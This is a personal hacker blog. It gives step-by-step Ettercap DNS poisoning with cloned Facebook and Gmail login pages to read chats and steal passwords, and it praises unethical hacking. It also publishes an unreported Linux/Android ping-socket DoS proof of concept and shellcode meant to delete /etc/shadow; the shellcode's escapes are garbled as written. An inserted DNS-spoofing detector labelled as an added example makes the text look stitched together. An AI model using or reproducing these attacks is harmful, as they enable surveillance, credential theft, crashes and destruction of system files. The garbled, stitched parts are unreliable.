The magic of DNS spoofing

After reading the post about intercepting Facebook chats, I talked with a friend about other, more “interesting” things that you can do with this simple attack.

Some months ago in Mexico, attacks on the press, supposedly by the government, were revealed, using SMS to infect cellphones.. well, I think an SMS is not necessary: just perform a DNS attack on a captive portal in a Starbucks, a hotel, a company.. and redirect the user to the malware with a simple button…

Doubts?… 🙂

Well… you can also apply DNS spoofing to *.videosXXXparahackearte.com just to create karma 😛

Reading chats

Well.. sometimes.. you need to know what others are writing about you. Why?.. hum.. well, it’s a good question, and I have a great answer.. ok, no.. but yesterday I needed… so….

The easiest way is to perform DNS poisoning using Ettercap. Open the ettercap.dns file and modify the domains you want to catch with the attack, for example.. facebook.com, *.facebook.com, *.gmail.com, gmail.com, web.whatsapp.com, etc…

So, after that you have two options: sniff the traffic using Wireshark.. but you need to know that you will have to attack the SSL certificates in order to read the chats, or… open SET, select the web vectors, clone the targets and point them to your computer, for example, clone https://www.facebook.com.

Now, using Ettercap, select the targets you want to attack, select “DNS poison” in the plug-ins, and start sniffing. When the user requests a website that you included in the .dns file, he/she will be redirected to your computer and pwned!… you can catch the passwords, the chats, the requests, and it will be “transparent” because the DNS is actually answering the victim with your IP.

Don’t judge me…

The new hackers… “ethical” hackers

[…] it focuses on how to become an ethical hacker. Mastering the art of hacking can be an extremely powerful skill that we hope will be used for good. The most successful hackers know how to navigate the thin line between right and wrong while hacking. Many people can break things, and even try to make a quick buck doing so. But imagine you can make the Internet safer, work with amazing companies around the world, and even get paid along the way. Your talent has the potential of keeping billions of people and their data secure. That is what we hope you aspire to.[…] – Pete Yaworski

 

Where did the real hackers go?… ethical hackers?… fuck Pete… have you sniffed the network at your school?, changed your notes?, stolen passwords?… good people always lose… hackers need to be unethical… fuck off with the world. If you can do something, do it.. weak people suffer, and it is ok.

I hate “ethical” hackers.

How to lose your Facebook account in a few steps

Some months ago I lost my Facebook account, it was hacked by… yep.. by Karen. But how could the incredible, invincible, fabulous vendetta be hacked?…

Well it was easy… actually very easy…

I was happily watching a lot of extreme porn on the Internet when Karen asked me for help, so I connected to a VPN, yeap.. my fault, we were in the same IP range.

She used Ettercap to perform DNS spoofing of www.facebook.com, pointing it to her computer, and on her computer she configured a fake landing page using The Social Engineering Toolkit. I usually need to be connected to different VPNs to work, so it’s normal for me to be disconnected from my accounts. I went into Facebook’s messenger, entered my credentials and… pwned!

u.u

And that’s all… you don’t fall me very well, as we say!
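Seen from the network's side, this post and “Reading chats” above leave the same trace: a public name answered with an address in the local range, sometimes followed by the real resolver's different answer to the same query. The detector below is an added example, not part of the original posts; the function names, the watch list and the sample packets are constructed for illustration, and each response is assumed to carry a single question.

```python
import ipaddress
import struct

WATCHED = ("facebook.com", "gmail.com", "web.whatsapp.com")  # domains named in the post

def a_records(msg):
    """Return (txid, qname, set of IPv4 answers) for one DNS response."""
    txid, _flags, _qd, ancount = struct.unpack("!HHHH", msg[:8])
    labels, off = [], 12
    while msg[off]:                                   # question name comes first, uncompressed
        labels.append(msg[off + 1:off + 1 + msg[off]].decode("ascii").lower())
        off += 1 + msg[off]
    off += 5                                          # root label + QTYPE + QCLASS
    ips = set()
    for _ in range(ancount):
        while msg[off] and msg[off] & 0xC0 != 0xC0:   # skip owner name labels
            off += 1 + msg[off]
        off += 2 if msg[off] else 1                   # compression pointer or root label
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        if rtype == 1 and rdlen == 4:                 # A record
            ips.add(ipaddress.IPv4Address(msg[off + 10:off + 14]))
        off += 10 + rdlen
    return txid, ".".join(labels), ips

def find_spoofing(responses):
    """Alert on watched names answered with a non-global IP or with conflicting answers."""
    alerts, seen = [], {}
    for msg in responses:
        try:
            txid, qname, ips = a_records(msg)
        except (IndexError, struct.error, UnicodeDecodeError):
            continue                                  # malformed packet: ignore
        if not any(qname == d or qname.endswith("." + d) for d in WATCHED):
            continue
        if any(not ip.is_global for ip in ips):
            alerts.append(("local-address", qname))
        if seen.setdefault((txid, qname), ips) != ips:
            alerts.append(("conflicting-answers", qname))
    return alerts

def sample(txid, name, ip):
    """Constructed test packet: one question, one A answer (owner name is a pointer)."""
    q = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\0"
    return (struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0) + q + struct.pack("!HH", 1, 1)
            + b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + ipaddress.IPv4Address(ip).packed)

SAMPLES = [sample(0x1A2B, "www.facebook.com", "192.168.1.50"),   # constructed addresses
           sample(0x1A2B, "www.facebook.com", "157.240.0.35")]
```

Both checks are heuristics: the watch list should hold only names that never legitimately resolve to internal addresses, and the conflicting-answers rule only fires when the genuine reply also reaches the sensor.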

Ping DoS on Linux (Android)

Yep… it sounds weird, maybe it sounds stupid coff.. coff.. and I know, it’s sooooo useless… but… well the story is this:

On Saturday I went with a friend to hum… well, not to walk, because I live in an extension of hell.. around 40º C, so it is not possible to walk, but to go to some places, and I tried to explain to her the difference between hacking (pentesting, attacks on Facebook, Whatsapp interception, etc) and real hacking (mostly vuln-dev)… she started to laugh when I compared hacking with art… and I told her that yes, sometimes, just as you can start to write, to paint or do whatever you want to do to feel better, you can start to look for bugs… and it’s relaxing and amusing… so I showed her how to find a bug on her phone.. and here is the result.

I’m not very sure if it has been reported to Android or to the Linux kernel project.. but I don’t want to have anything to do with Google or with Linus Torvalds… so I prefer to just publish the bug here.. and on the other hand I’m a bad guy… so I don’t report bugs anymore.

Oh yeap… she was not convinced that hacking is like art and she told me that I’m a friki because I like this kind of strange thing D: … I’m not a friki D:

 


#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <pthread.h>

static int sockfd = 0;
static struct sockaddr_in addr = {0};

/* Second thread: keeps calling connect() with sin_family = 0 on the shared socket. */
void *fuzz(void *param){
    while(1){
        addr.sin_family = 0;
        printf("sin_family1 = %08lx\n", (unsigned long)addr.sin_family);
        connect(sockfd, (struct sockaddr *)&addr, 16);
    }
    return NULL;
}

int main(int argc, char **argv)
{
    /* ICMP datagram ("ping") socket shared by both threads. */
    sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
    pthread_t thrd;
    pthread_create(&thrd, NULL, fuzz, NULL);
    while(1){
        addr.sin_family = 0x1a;
        addr.sin_port = 0;
        addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        connect(sockfd, (struct sockaddr *)&addr, 16);
        addr.sin_family = 0;
    }
    return 0;
}

Without /etc/shadow


char tlayula[] =
"x31xc0"
"xb0x46"
"x31xdb"
"x31xc9"
"xcdx80"
"x31xc0"
"x50"
"x68x2fx2fx72x6d"
"x68x2fx62x69x6e"
"x89xe3"
"x50"
"x68x61x64x6fx77"
"x68x2fx2fx73x68"
"x68x2fx65x74x63"
"x89xe1"
"x50"
"x51"
"x53"
"x89xe1"
"xb0x0b"
"xcdx80";
main()
{
(*(void(*) ()) tlayula)();
}

Life is cruel… and I’m worse B\